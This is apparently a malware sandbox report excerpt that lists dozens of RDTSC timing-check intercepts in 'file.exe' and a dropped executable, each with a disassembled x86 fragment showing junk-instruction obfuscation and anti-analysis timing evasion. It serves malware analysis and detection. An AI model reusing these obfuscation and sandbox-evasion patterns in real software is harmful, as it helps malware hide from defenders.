Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC031F second address: 4EC0324 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC0324 second address: 4EC0343 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F28C4758085h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC0377 second address: 4EC037B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC037B second address: 4EC0381 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC0435 second address: 4EC0448 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F28C47EE2BFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC0448 second address: 4EC0457 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC0457 second address: 4EC045D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC045D second address: 4EC04C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C4758088h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F28C475807Eh 0x00000011 and eax, 1AE49F98h 0x00000017 jmp 00007F28C475807Bh 0x0000001c popfd 0x0000001d movzx eax, di 0x00000020 popad 0x00000021 mov ebp, esp 0x00000023 jmp 00007F28C475807Bh 0x00000028 pop ebp 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F28C4758080h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC04C2 second address: 4EC04D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C47EE2BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC050F second address: 4EC0515 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC0616 second address: 4EC0616 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C47EE2C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 inc edx 0x0000000a pushad 0x0000000b mov edx, esi 0x0000000d mov ah, EEh 0x0000000f popad 0x00000010 test al, al 0x00000012 jmp 00007F28C47EE2BBh 0x00000017 jne 00007F28C47EE276h 0x0000001d mov al, byte ptr [edx] 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F28C47EE2BDh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC064A second address: 4EC064E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC064E second address: 4EC06B4 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F28C47EE2C0h 0x00000008 and ah, 00000018h 0x0000000b jmp 00007F28C47EE2BBh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushfd 0x00000014 jmp 00007F28C47EE2C8h 0x00000019 sub cx, 6678h 0x0000001e jmp 00007F28C47EE2BBh 0x00000023 popfd 0x00000024 popad 0x00000025 sub edx, esi 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F28C47EE2C1h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC06B4 second address: 4EC06BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC06BA second address: 4EC071B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, cx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov edi, dword ptr [ebp+08h] 0x0000000e jmp 00007F28C47EE2C2h 0x00000013 dec edi 0x00000014 pushad 0x00000015 mov ax, 434Dh 0x00000019 pushfd 0x0000001a jmp 00007F28C47EE2BAh 0x0000001f add al, 00000068h 0x00000022 jmp 00007F28C47EE2BBh 0x00000027 popfd 0x00000028 popad 0x00000029 lea ebx, dword ptr [edi+01h] 0x0000002c jmp 00007F28C47EE2C6h 0x00000031 mov al, byte ptr [edi+01h] 0x00000034 pushad 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC071B second address: 4EC0748 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 call 00007F28C4758089h 0x0000000a push esi 0x0000000b pop edi 0x0000000c pop esi 0x0000000d popad 0x0000000e inc edi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 movzx eax, dx 0x00000015 mov ax, di 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC0748 second address: 4EC07B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C47EE2BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test al, al 0x0000000b jmp 00007F28C47EE2C0h 0x00000010 jne 00007F29352465CDh 0x00000016 jmp 00007F28C47EE2C0h 0x0000001b mov ecx, edx 0x0000001d pushad 0x0000001e mov bl, C0h 0x00000020 popad 0x00000021 shr ecx, 02h 0x00000024 jmp 00007F28C47EE2C4h 0x00000029 rep movsd 0x0000002b rep movsd 0x0000002d rep movsd 0x0000002f rep movsd 0x00000031 rep movsd 0x00000033 jmp 00007F28C47EE2C0h 0x00000038 mov ecx, edx 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d mov cx, 98AFh 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC07B7 second address: 4EC0825 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C4758085h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and ecx, 03h 0x0000000c pushad 0x0000000d push eax 0x0000000e mov esi, edi 0x00000010 pop edx 0x00000011 movzx eax, di 0x00000014 popad 0x00000015 rep movsb 0x00000017 jmp 00007F28C4758087h 0x0000001c mov dword ptr [ebp-04h], FFFFFFFEh 0x00000023 jmp 00007F28C4758086h 0x00000028 mov eax, ebx 0x0000002a pushad 0x0000002b call 00007F28C475807Eh 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC0825 second address: 4EC084A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 mov dx, E874h 0x00000009 popad 0x0000000a mov ecx, dword ptr [ebp-10h] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F28C47EE2C6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC084A second address: 4EC0850 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC0850 second address: 4EC08AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C47EE2BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr fs:[00000000h], ecx 0x00000012 pushad 0x00000013 mov si, BDB3h 0x00000017 pushfd 0x00000018 jmp 00007F28C47EE2C8h 0x0000001d sub cx, 67B8h 0x00000022 jmp 00007F28C47EE2BBh 0x00000027 popfd 0x00000028 popad 0x00000029 pop ecx 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F28C47EE2C0h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC08AF second address: 4EC08B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC08B5 second address: 4EC0904 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C47EE2BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a jmp 00007F28C47EE2C0h 0x0000000f pop esi 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F28C47EE2BDh 0x00000017 sbb ah, 00000066h 0x0000001a jmp 00007F28C47EE2C1h 0x0000001f popfd 0x00000020 popad 0x00000021 pop ebx 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC0904 second address: 4EC0908 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC0908 second address: 4EC050F instructions: 0x00000000 rdtsc 0x00000002 mov dh, ah 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dl, 76h 0x00000008 popad 0x00000009 leave 0x0000000a pushad 0x0000000b mov esi, 2BF823D9h 0x00000010 mov ebx, ecx 0x00000012 popad 0x00000013 retn 0008h 0x00000016 cmp dword ptr [ebp-2Ch], 10h 0x0000001a mov eax, dword ptr [ebp-40h] 0x0000001d jnc 00007F28C47EE2B5h 0x0000001f push eax 0x00000020 lea edx, dword ptr [ebp-00000590h] 0x00000026 push edx 0x00000027 call esi 0x00000029 push 00000008h 0x0000002b jmp 00007F28C47EE2BEh 0x00000030 push 3571E133h 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC0A4A second address: 4EC0B05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C4758089h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F28C475807Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 pushad 0x00000012 mov ecx, edi 0x00000014 pushfd 0x00000015 jmp 00007F28C4758083h 0x0000001a sbb ah, 0000005Eh 0x0000001d jmp 00007F28C4758089h 0x00000022 popfd 0x00000023 popad 0x00000024 pushfd 0x00000025 jmp 00007F28C4758080h 0x0000002a and ax, 8358h 0x0000002f jmp 00007F28C475807Bh 0x00000034 popfd 0x00000035 popad 0x00000036 xchg eax, ebp 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a pushfd 0x0000003b jmp 00007F28C475807Bh 0x00000040 xor ax, B21Eh 0x00000045 jmp 00007F28C4758089h 0x0000004a popfd 0x0000004b mov eax, 35940FE7h 0x00000050 popad 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC0B05 second address: 4EC0B32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F28C47EE2C3h 0x00000008 push ecx 0x00000009 pop edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F28C47EE2BCh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC0B32 second address: 4EC0B36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC0B36 second address: 4EC0B3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC0B3C second address: 4EC0B43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, C7h 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC0B43 second address: 4EC0B51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC0B51 second address: 4EC0B5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C475807Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 9105D7 second address: 9105FB instructions: 0x00000000 rdtsc 0x00000002 js 00007F28C47EE2B6h 0x00000008 jmp 00007F28C47EE2C7h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 90F685 second address: 90F698 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C475807Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 90F698 second address: 90F69C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 90FBF0 second address: 90FBF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 90FD43 second address: 90FD5D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C47EE2C4h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 90FD5D second address: 90FD63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 90FD63 second address: 90FD8D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C47EE2C0h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push edx 0x0000000e jng 00007F28C47EE2BEh 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 90FD8D second address: 90FD93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 9118B0 second address: 9118BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 9118BE second address: 9118C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 9118C2 second address: 9118FE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F28C47EE2C3h 0x0000000b popad 0x0000000c nop 0x0000000d mov edi, dword ptr [ebp+122D3C60h] 0x00000013 push 00000000h 0x00000015 sub dword ptr [ebp+122D26FDh], eax 0x0000001b call 00007F28C47EE2B9h 0x00000020 push eax 0x00000021 push edx 0x00000022 je 00007F28C47EE2B8h 0x00000028 push ebx 0x00000029 pop ebx 0x0000002a rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 9118FE second address: 911911 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F28C4758076h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 911A7C second address: 911B17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 pop eax 0x00000008 pop ecx 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d je 00007F28C47EE2BCh 0x00000013 mov dword ptr [ebp+122D1D9Dh], esi 0x00000019 mov edx, 7240FA53h 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push ecx 0x00000023 call 00007F28C47EE2B8h 0x00000028 pop ecx 0x00000029 mov dword ptr [esp+04h], ecx 0x0000002d add dword ptr [esp+04h], 00000014h 0x00000035 inc ecx 0x00000036 push ecx 0x00000037 ret 0x00000038 pop ecx 0x00000039 ret 0x0000003a jmp 00007F28C47EE2C3h 0x0000003f and edx, 34A2DF00h 0x00000045 call 00007F28C47EE2B9h 0x0000004a push edi 0x0000004b pushad 0x0000004c pushad 0x0000004d popad 0x0000004e push ebx 0x0000004f pop ebx 0x00000050 popad 0x00000051 pop edi 0x00000052 push eax 0x00000053 jmp 00007F28C47EE2C3h 0x00000058 mov eax, dword ptr [esp+04h] 0x0000005c push edi 0x0000005d jg 00007F28C47EE2C0h 0x00000063 pop edi 0x00000064 mov eax, dword ptr [eax] 0x00000066 push ecx 0x00000067 push eax 0x00000068 push edx 0x00000069 jne 00007F28C47EE2B6h 0x0000006f rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 911B17 second address: 911B32 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C475807Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 911B32 second address: 911BB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dx, bx 0x0000000a push 00000003h 0x0000000c sub dword ptr [ebp+122D3468h], esi 0x00000012 push 00000000h 0x00000014 mov esi, dword ptr [ebp+122D3D3Ch] 0x0000001a push 00000003h 0x0000001c pushad 0x0000001d mov edx, dword ptr [ebp+122D3C2Ch] 0x00000023 popad 0x00000024 mov edi, esi 0x00000026 push AA8D4DAFh 0x0000002b jmp 00007F28C47EE2BAh 0x00000030 add dword ptr [esp], 1572B251h 0x00000037 push 00000000h 0x00000039 push ebp 0x0000003a call 00007F28C47EE2B8h 0x0000003f pop ebp 0x00000040 mov dword ptr [esp+04h], ebp 0x00000044 add dword ptr [esp+04h], 00000014h 0x0000004c inc ebp 0x0000004d push ebp 0x0000004e ret 0x0000004f pop ebp 0x00000050 ret 0x00000051 lea ebx, dword ptr [ebp+12456771h] 0x00000057 adc dh, FFFFFFB9h 0x0000005a xchg eax, ebx 0x0000005b push eax 0x0000005c push edx 0x0000005d ja 00007F28C47EE2CFh 0x00000063 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 911C69 second address: 911C6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 911C6F second address: 911C73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 911C73 second address: 911CFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov edi, dword ptr [ebp+122D3CD8h] 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007F28C4758078h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 0000001Ch 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b push E2DBF26Bh 0x00000030 jg 00007F28C4758091h 0x00000036 add dword ptr [esp], 1D240E15h 0x0000003d clc 0x0000003e push 00000003h 0x00000040 mov ecx, dword ptr [ebp+122D25F4h] 0x00000046 push 00000000h 0x00000048 or ecx, 644ABFBCh 0x0000004e push 00000003h 0x00000050 xor ecx, dword ptr [ebp+122D3C38h] 0x00000056 push DDAFB23Fh 0x0000005b jbe 00007F28C4758090h 0x00000061 push eax 0x00000062 push edx 0x00000063 push eax 0x00000064 push edx 0x00000065 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 911CFD second address: 911D01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 92419A second address: 92419F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 931E62 second address: 931E85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F28C47EE2C6h 0x0000000a jc 00007F28C47EE2CDh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 931E85 second address: 931E9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F28C4758081h 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 932012 second address: 93202F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F28C47EE2C3h 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 932168 second address: 93216C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 93216C second address: 932172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 932172 second address: 932178 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 932178 second address: 932198 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C47EE2C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 9324A1 second address: 9324A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 9324A5 second address: 9324A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 932645 second address: 93264A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 932800 second address: 932804 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 932C66 second address: 932C71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 932F2F second address: 932F33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 8F45BE second address: 8F45D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jbe 00007F28C4758076h 0x0000000b jl 00007F28C4758076h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 8F45D2 second address: 8F45DC instructions: 0x00000000 rdtsc 0x00000002 jp 00007F28C47EE2BEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 8F45DC second address: 8F45E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 93308D second address: 93309B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 93309B second address: 9330A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 9330A1 second address: 9330AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jc 00007F28C47EE2BCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	RDTSC instruction interceptor: First address: 9330AE second address: 9330B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
